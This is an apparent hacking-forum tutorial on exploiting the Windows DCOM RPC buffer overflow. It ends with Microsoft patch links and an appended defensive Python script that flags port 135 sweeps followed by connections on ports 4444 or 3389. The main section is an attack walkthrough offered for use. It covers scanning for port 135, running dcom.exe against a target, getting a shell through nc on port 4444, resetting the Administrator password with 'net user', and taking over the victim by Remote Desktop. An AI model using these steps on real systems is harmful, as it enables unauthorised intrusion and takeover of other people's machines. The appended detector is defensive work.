
What is RPC exploit.


What is RPC exploit.

RPC stands for Remote Procedure Call. The vulnerability lies in the way RPC is implemented in most versions of Windows. The flaw involves the Distributed Component Object Model (DCOM) interface with RPC, which listens on TCP/IP port 135 and other ports. When exploited via those ports, a buffer overflow is created that could allow remote attackers to run commands with the highest system privileges.

Operating systems affected

Microsoft Windows NT® 4.0

Microsoft Windows® 2000

Microsoft Windows XP

Microsoft Windows Server 2003

NOTE: Microsoft Windows Millennium, 95, 98, 98 SE are not affected.

Tools to use.

Well, there are many programs out there for you to download and use for attack. Let's see some:

Angry Ip Scanner (in our "Scanners" download section)

dcom.exe (download the one for your need here)

nc.exe (in our "Scanners" download section)

RPC Exploit GUI v2 here

How to use them.

Angry Ip Scanner: First of all, open Angry Ip Scanner and scan an IP range for port 135.

dcom.exe: You must run it from your MS-DOS prompt (START ---> Run ---> cmd). Then just type dcom ex. dcom 5 127.0.0.0 (please note that when you run dcom.exe it will show you which number indicates each OS... in this example I use number 5).

nc.exe: Just run nc.exe (from your MS-DOS prompt again) and type nc 4444 (please note that nc might be nc***... just use its name or rename it to nc). Now type in net user Administrator (choose your own pass). So, if everything went right, go to your START ---> run ---> mstsc and just type in your victim's IP and press connect. When connected, do whatever you like.

RPC Exploit GUI v2: Not much to say except that it works fine (your antivirus might get this as infected or as Hacktool (read "Antiviruses" in tutorials section)). Much easier than the whole procedure described above.

How to protect yourself

Microsoft offers a freely downloadable patch for this vulnerability. It's available at:

Windows NT

Code:

http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE

Windows 2000

Code:

http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe

Windows XP

Code:

http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe

NOTE: If there is a broken link, it is not our fault. Just visit Microsoft Download Center and search for the patch yourself, or just use the Windows live update.
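For defenders, the sequence described in the post (a sweep of TCP 135, then connections to port 4444 and Remote Desktop on a host that answered) leaves a recognisable trail in firewall logs. The following is an added example, not part of the original post: the log format, the sample lines, and the sweep threshold are constructed assumptions, and 3389 is the default port used by mstsc.

```python
"""Flag the traffic pattern described in the post: a sweep of TCP 135,
then connections to TCP 4444 or 3389 on a host that accepted the RPC contact."""
from collections import defaultdict

# Constructed sample log (hypothetical format): time src dst dst_port action
SAMPLE_LOG = """\
10:00:01 203.0.113.7 192.0.2.10 135 ALLOW
10:00:01 203.0.113.7 192.0.2.11 135 DROP
10:00:02 203.0.113.7 192.0.2.12 135 DROP
10:00:02 203.0.113.7 192.0.2.13 135 DROP
10:03:40 203.0.113.7 192.0.2.10 4444 ALLOW
10:05:12 203.0.113.7 192.0.2.10 3389 ALLOW
10:06:00 198.51.100.4 192.0.2.10 135 ALLOW
10:07:30 198.51.100.9 192.0.2.20 3389 ALLOW
"""

RPC_PORT = 135                  # DCOM/RPC port named in the post
FOLLOW_UP_PORTS = {4444, 3389}  # ports the post connects to afterwards (nc, mstsc)
SWEEP_THRESHOLD = 3             # assumed: distinct hosts probed before it counts as a sweep


def parse(log_text):
    """Yield (time, src, dst, port, action) tuples, skipping malformed lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5 or not parts[3].isdigit():
            continue
        yield parts[0], parts[1], parts[2], int(parts[3]), parts[4]


def analyze(log_text):
    """Return (sources sweeping port 135, follow-up events after allowed RPC contact)."""
    probed = defaultdict(set)    # src -> hosts it contacted on port 135
    reached = defaultdict(set)   # src -> hosts where the port 135 contact was allowed
    follow_ups = []
    for time, src, dst, port, action in parse(log_text):
        if port == RPC_PORT:
            probed[src].add(dst)
            if action == "ALLOW":
                reached[src].add(dst)
        elif port in FOLLOW_UP_PORTS and action == "ALLOW" and dst in reached[src]:
            follow_ups.append((time, src, dst, port))
    sweepers = sorted(s for s, hosts in probed.items() if len(hosts) >= SWEEP_THRESHOLD)
    return sweepers, follow_ups


if __name__ == "__main__":
    sweepers, follow_ups = analyze(SAMPLE_LOG)
    print("sources sweeping TCP 135:", sweepers)
    for event in follow_ups:
        print("follow-up after allowed RPC contact:", event)
```

Any host that appears in a follow-up event should be checked for the KB823980 patch and for unexpected changes to local account passwords.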
